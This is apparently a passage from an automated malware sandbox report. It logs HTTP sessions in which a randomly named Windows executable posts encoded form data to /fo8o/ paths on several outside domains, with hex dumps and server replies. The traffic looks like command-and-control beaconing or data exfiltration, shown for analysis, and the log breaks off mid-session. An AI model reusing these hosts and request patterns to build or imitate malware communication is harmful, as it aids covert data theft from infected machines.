                                                                                                  Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.104972246.30.213.191801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:52.310908079 CEST1822OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.antonio-vivaldi.mobi
                                                                                                  Origin: http://www.antonio-vivaldi.mobi
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 77 4f 43 71 33 36 4a 72 41 44 65 47 6d 59 5a 7a 54 50 6c 75 47 6f 75 75 4c 31 4b 4e 41 38 53 77 70 2b 30 2f 4f 72 54 70 70 47 6a 38 38 63 4f 58 55 38 73 54 4d 77 61 33 38 63 74 35 64 64 35 64 49 35 56 39 4d 39 66 4d 35 61 31 37 58 63 55 4b 44 7a 55 6c 2f 78 33 36 52 32 49 4e 4f 62 4f 45 70 62 4e 39 2f 4f 67 4c 67 32 4c 42 78 68 75 77 30 43 77 4b 6b 4b 68 38 36 65 4d 62 43 54 58 38 72 54 63 77 74 4b 76 58 53 61 6b 77 69 73 61 6e 55 72 2f 47 6d 49 74 33 52 4b 39 36 62 50 2b 69 66 78 51 [TRUNCATED]
                                                                                                  Data Ascii: FBEd=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJwOCq36JrADeGmYZzTPluGouuL1KNA8Swp+0/OrTppGj88cOXU8sTMwa38ct5dd5dI5V9M9fM5a17XcUKDzUl/x36R2INObOEpbN9/OgLg2LBxhuw0CwKkKh86eMbCTX8rTcwtKvXSakwisanUr/GmIt3RK96bP+ifxQWkrPZduiYh/QDByfmTs3OolUKqZbiP8yyqVs1pJg64J5EYbpThc6Ak1/jUoVr5bOq3a/POoshmotLHgZgE12xzL/q8UGvQTMEDRN2b6F53PzJ+kQ2qqWjcx/eJv/b5clHrjV8rz0NVXHFjj3vZ/jPS9Jd2Uezkd2RimdtBs/Qm4CObyhW9raJsHUBHZsDXivzJ7j0nK2smaIdpYOF5n0ytQSocC3IsM8vHF3IUthR+mDVXsqhWzC4juP0XdDmw9WR38G92hq5dsFu4nucFRf9MuZ8oR+uUL5RRq5ghGPcqnVkBZ1eb9cEVHd5I7LNJXgfpBp5dV+ie7biFD1pzIrJIf2GTV9xRwXTIt5CliI7En8uOiWG3UCo+vnvzMzrsvVvSDCtNZJUxtWfMjDrRv4wn3ZjSunO8SDQvIZaBJCxqtdADI+QtOLDWwSeMULBWfeZBhAhD0fxJFC9zJXKSihGqo9N/Qy9L3aWii1rT3JCGyBx0Ct4JlDwblTKeFGQAflcL0uqL+Pc7MhgpH0V4mxb+q2hee3rZJtB7GjicKRhAHPjVL6u5TokQacg2cktypkxyqyw0LU3gxJ6qmwpEqh3FqnkDLxbIDxjAdpyUWVsoc7txBOwPNhobixrqqTpMDiorTMM7impRfCzUzQXelykl/Phmch5sAryR [TRUNCATED]
                                                                                                  May 8, 2024 10:49:52.622256994 CEST560INHTTP/1.1 302 Found
                                                                                                  Cache-Control: max-age:600, public
                                                                                                  Content-Length: 163
                                                                                                  Expires: Wed, 08 May 2024 08:59:52 GMT
                                                                                                  Last-Modified: Wed, 08 May 2024 08:49:52 GMT
                                                                                                  Location: https://musee.mobi/vivaldi/fo8o/
                                                                                                  Date: Wed, 08 May 2024 08:49:52 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  X-Onecom-Cluster-Name:
                                                                                                  X-Varnish: 1685887819
                                                                                                  Age: 0
                                                                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.2.104972346.30.213.191801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:55.162235975 CEST506OUTGET /fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.antonio-vivaldi.mobi
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:49:55.473931074 CEST842INHTTP/1.1 302 Found
                                                                                                  Cache-Control: max-age:600, public
                                                                                                  Content-Length: 310
                                                                                                  Expires: Wed, 08 May 2024 08:59:55 GMT
                                                                                                  Last-Modified: Wed, 08 May 2024 08:49:55 GMT
                                                                                                  Date: Wed, 08 May 2024 08:49:55 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  location: https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch
                                                                                                  X-Onecom-Cluster-Name:
                                                                                                  X-Varnish: 1765543436
                                                                                                  Age: 0
                                                                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 3f 46 42 45 64 3d 50 54 6c 35 67 55 2f 33 43 44 2f 58 68 67 35 4e 64 31 48 57 69 26 23 34 33 3b 65 4b 4f 69 4a 55 52 4a 52 46 54 5a 75 56 6d 6d 36 67 66 72 77 53 6a 6e 42 72 53 72 61 55 2f 30 47 64 48 41 73 44 30 6d 46 78 4e 72 41 52 46 30 7a 57 64 38 43 4c 77 76 48 4b 62 73 36 5a 62 7a 4a 51 26 23 34 33 3b 4a 6b 6c 4c 30 53 6a 30 36 33 39 69 69 53 54 49 67 6b 6a 38 77 47 4f 36 41 3d 3d 26 61 6d 70 3b 34 68 38 3d 59 50 51 58 38 54 63 68 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ&#43;JklL0Sj0639iiSTIgkj8wGO6A==&amp;4h8=YPQX8Tch" >here</a></p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.2.104972485.159.66.93801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:01.722522974 CEST767OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.magmadokum.com
                                                                                                  Origin: http://www.magmadokum.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 45 6d 33 64 62 52 30 62 51 36 71 65 47 51 6a 62 50 78 5a 39 4f 7a 35 56 43 53 66
                                                                                                  Data Ascii: FBEd=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0Em3dbR0bQ6qeGQjbPxZ9Oz5VCSf
                                                                                                  May 8, 2024 10:50:02.122688055 CEST225INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.14.1
                                                                                                  Date: Wed, 08 May 2024 08:50:01 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  X-Rate-Limit-Limit: 5s
                                                                                                  X-Rate-Limit-Remaining: 19
                                                                                                  X-Rate-Limit-Reset: 2024-05-08T08:50:06.9472799Z


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.2.104972585.159.66.93801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:04.607462883 CEST791OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.magmadokum.com
                                                                                                  Origin: http://www.magmadokum.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 33 62 45 6e 31 42 6a 47 4d 32 32 4a 6f 74 44 6b 4a 79 47 6e 78 76 45 65 4b 35 51 3d 3d
                                                                                                  Data Ascii: FBEd=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5v3bEn1BjGM22JotDkJyGnxvEeK5Q==
                                                                                                  May 8, 2024 10:50:04.999367952 CEST225INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.14.1
                                                                                                  Date: Wed, 08 May 2024 08:50:04 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  X-Rate-Limit-Limit: 5s
                                                                                                  X-Rate-Limit-Remaining: 18
                                                                                                  X-Rate-Limit-Reset: 2024-05-08T08:50:06.9472799Z


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.104972685.159.66.93801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:08.829221964 CEST1804OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.magmadokum.com
                                                                                                  Origin: http://www.magmadokum.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 64 30 37 2b 54 57 4b 4b 33 48 63 2b 76 79 77 31 69 48 36 48 36 48 37 46 6a 59 4a 63 59 73 72 2b 5a 55 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 34 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 [TRUNCATED]
                                                                                                  Data Ascii: FBEd=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/rCpd07+TWKK3Hc+vyw1iH6H6H7FjYJcYsr+ZUYwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs94QIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBmuRqSPONduHp5ua2VurEsyLtqn9Hwf4C+3V5P8iD6jh4S6IfuEsb550muWnceqjpZzyLMUiESspZqU2hzpCChAI0GyglfCGDRHNqW+tFURp11YGc4A0reLXUzjDj4JByPzEbgspUA5JwcSASV3I+aUtmMqNg6EIe8XkcdGCDX/OkbL49KZb+KDffwx+CbNQ3yAo7NjvmTYSR8DAfc3qQFbJPrpnFVmSumx9p8/UGwPjka2ik/8lUJTEmUQOF8t/UX1EZy206WWjGfqznG992crrnYbPxZEZ3IUAI+EcS/x8UC98CIKe858+IvPaiGHtENm0BGDOEoF2or9zLjdM6mFSouf9ml7830pwh62vBcEnpIoTgX+kmpIDfBbyxEMxpL1I0jbQa43dteSkIEcKOScn2lTbpbUKGHck8WQeIIbxXpAjcxAI4p+jGFcsuPfsnvRkHTNdYWS7kbSdvJSBTKsqsXOKSRayjS6JW050V05PGbfj++eyDafYuDvyYk1E9qx+aLTmnDE6j7C9UlO65mjfGgehCI6HEmghAMegoadZscG+DgL9ZeNJ+UpSnawN6qWt1SVi4WOlvahOZ2iM8FSk [TRUNCATED]
                                                                                                  May 8, 2024 10:50:09.224093914 CEST225INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.14.1
                                                                                                  Date: Wed, 08 May 2024 08:50:09 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  X-Rate-Limit-Limit: 5s
                                                                                                  X-Rate-Limit-Remaining: 19
                                                                                                  X-Rate-Limit-Reset: 2024-05-08T08:50:14.0491826Z


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  16192.168.2.104972785.159.66.93801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:11.721383095 CEST500OUTGET /fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ== HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.magmadokum.com
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:50:12.084863901 CEST225INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.14.1
                                                                                                  Date: Wed, 08 May 2024 08:50:11 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  X-Rate-Limit-Limit: 5s
                                                                                                  X-Rate-Limit-Remaining: 19
                                                                                                  X-Rate-Limit-Reset: 2024-05-08T08:50:16.9082388Z


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  17192.168.2.104972891.195.240.94801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:17.592354059 CEST770OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.rssnewscast.com
                                                                                                  Origin: http://www.rssnewscast.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 50 59 32 62 39 49 2f 72 43 4d 46 39 71 6e 72 74 44 4b 75 56 32 7a 56 31 67 5a 57
                                                                                                  Data Ascii: FBEd=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pPY2b9I/rCMF9qnrtDKuV2zV1gZW
                                                                                                  May 8, 2024 10:50:17.907753944 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                  date: Wed, 08 May 2024 08:50:17 GMT
                                                                                                  content-type: text/html
                                                                                                  content-length: 556
                                                                                                  server: NginX
                                                                                                  connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  18192.168.2.104972991.195.240.94801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:50:20.438882113 CEST794OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.rssnewscast.com
                                                                                                  Origin: http://www.rssnewscast.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
